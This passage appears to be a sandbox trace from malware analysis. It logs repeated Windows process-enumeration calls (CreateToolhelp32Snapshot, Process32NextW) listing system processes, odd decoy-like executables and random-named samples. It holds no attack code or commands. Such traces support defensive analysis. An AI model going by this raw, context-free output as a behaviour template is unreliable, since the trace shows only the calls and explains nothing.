pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.227] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.227] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.228] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.229] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0109.229] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.230] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.231] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0109.232] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.233] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.234] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0109.235] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0109.237] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0109.238] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.239] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.240] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0109.248] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0109.249] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0109.251] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0109.252] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0109.253] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0109.255] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0109.256] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0109.258] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0109.259] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0109.261] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0109.262] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0109.264] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0109.265] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0109.266] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0109.268] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0109.269] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0109.270] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0109.271] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0109.284] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0109.285] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.286] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0109.287] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0109.288] CloseHandle (hObject=0xbc) returned 1 [0109.288] Sleep (dwMilliseconds=0x12c) [0109.604] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0109.609] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.609] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0109.610] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0109.611] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.611] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0109.612] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0109.613] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0109.613] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0109.614] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0109.615] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0109.615] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.616] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.617] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.617] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.618] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.619] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0109.619] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.620] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.620] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0109.622] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.623] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.625] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0109.626] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0109.627] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0109.628] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0109.629] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0109.630] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0109.631] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0109.633] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0109.634] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0109.635] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0109.636] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0109.638] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0109.639] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0109.640] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0109.641] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0109.643] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0109.644] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0109.645] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0109.657] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0109.658] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0109.659] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0109.661] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0109.662] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0109.663] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 